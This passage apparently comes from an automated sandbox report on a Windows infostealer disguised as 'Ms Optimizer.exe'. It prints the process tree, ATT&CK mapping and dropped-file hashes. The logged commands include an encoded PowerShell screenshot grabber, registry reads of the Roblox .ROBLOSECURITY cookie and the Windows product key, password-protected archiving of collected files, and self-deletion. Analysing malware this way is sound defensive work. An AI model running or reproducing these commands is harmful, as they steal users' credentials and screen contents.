- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1848
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:3048
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1892
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2jm4sl1p\2jm4sl1p.cmdline"
        5⤵
        
        PID:4112
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD4F3.tmp" "c:\Users\Admin\AppData\Local\Temp\2jm4sl1p\CSC88A5BA7DA16D473DAF824F82E8BBBFDC.TMP"
        6⤵
        
        PID:3328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4988
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1084
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1016
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2532
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3992
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1576
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3604
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1888
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1668
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2532
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4660
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1256
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1244
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI44042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\5DAqd.zip" *"
    3⤵
    PID:4992
  - - C:\Users\Admin\AppData\Local\Temp\_MEI44042\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI44042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\5DAqd.zip" *
      4⤵
      Executes dropped EXE
      PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3956
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3848
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:3300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4868
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Ms Optimizer.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2300
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4348

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4484
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2864
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2004 -parentBuildID 20240401114208 -prefsHandle 1932 -prefMapHandle 1924 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0f26466-db0e-40fc-bde4-69edbaf6e659} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" gpu
    3⤵
    PID:1116
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2428 -parentBuildID 20240401114208 -prefsHandle 2420 -prefMapHandle 2408 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {20cb4ae8-bbe9-4cf4-bdb4-df26c3dadd52} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" socket
    3⤵
    PID:2040
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3176 -childID 1 -isForBrowser -prefsHandle 1672 -prefMapHandle 1560 -prefsLen 23858 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {057370dd-121e-4141-b8f2-b3d7abf11880} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" tab
    3⤵
    PID:2292
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3680 -childID 2 -isForBrowser -prefsHandle 1388 -prefMapHandle 2660 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {73b90cde-4af2-487e-98aa-a74e221ac50f} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" tab
    3⤵
    PID:3772
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4792 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4808 -prefMapHandle 4716 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d2e0467-ba81-4833-b8a7-667babb022f3} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" utility
    3⤵
    - Checks processor information in registry
    PID:3752
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5384 -childID 3 -isForBrowser -prefsHandle 5352 -prefMapHandle 5372 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {96bf8fbf-6e60-4fdd-9aa2-f01c7f3eca37} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" tab
    3⤵
    PID:5652
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5392 -childID 4 -isForBrowser -prefsHandle 5264 -prefMapHandle 5292 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a94903b-c2de-4ac0-b90d-62e78b0ed122} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" tab
    3⤵
    PID:5660
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5648 -childID 5 -isForBrowser -prefsHandle 5748 -prefMapHandle 5752 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cdc889c3-ae19-4bd5-90a0-e7fc7b0eb570} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" tab
    3⤵
    PID:5676
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6128 -childID 6 -isForBrowser -prefsHandle 6116 -prefMapHandle 6088 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e74bb07-1d4c-4e3d-ac01-8700d2efcdaa} 2864 "\\.\pipe\gecko-crash-server-pipe.2864" tab
    3⤵
    PID:3232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b5bf6b0261deb53c0e3d422e3f83a664

SHA1
60cd83ab6dd15abaa9abf34d9ab54e42c8eefa16

SHA256
a431a9e84c64c6ad29339df6a714cb697081dc1c6c5557ada967d4caaeed0c1c

SHA512
27dfba0d2d7ebce4e6eebdeefa81b2518c5222efb9d37b4c323023e5117eed30ad6aeba8e062bde96d17d53b01bb9a59313229aeaf4863c8b30d9bbb09d46bff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d14dd9dd79514a51aa80745672486c21

SHA1
65d9555e2e80fbaaaab9cff16aa607601a36e7fe

SHA256
496404417d08caf2a7a33f2ce7b10eb115f1829e11c72cd03bb86bdaa13e5a2c

SHA512
85206bc9652142ecc6dd26c341bb7b7564e5959823175c29c80026236595f824a4fbae1d354b058f4ef064f08c966e2bf250ee4d8466cc0f19d0372b2c8217e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
332B

MD5
dedc26dc8c639a0b594b94716a1e8ff8

SHA1
d32be144daf181607d0c43e3979b07e1adfc60c8

SHA256
608f85b52e4afaf4c59a4b49c42d209be79571ca1dce111b7742f2ec0f22f922

SHA512
3b906d5f140e9452de6c6517b65605d249f0fbe991029663f5e579c12f3301cbc829d67dfe3d1b44399cafb05b81c2dec0207ce589b55fe3d83631402dfc9fd0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0e75b81ea83d37167a5d829ca3740b94

SHA1
f74e57a6bea0815a65e9a7879bdec1c296bb7531

SHA256
4f53b06e70428939960e82f5d622ca681a93eef7311de3be308b3671ee09cbcc

SHA512
aff4cd5a6332abe8ba5728af51adaff696904b63375a1569255cc9db263c59fe40733a038b58e097fdc0f76746b59e8a3837231ab83ad8f4d91da06ab1e640e9

Download Submit
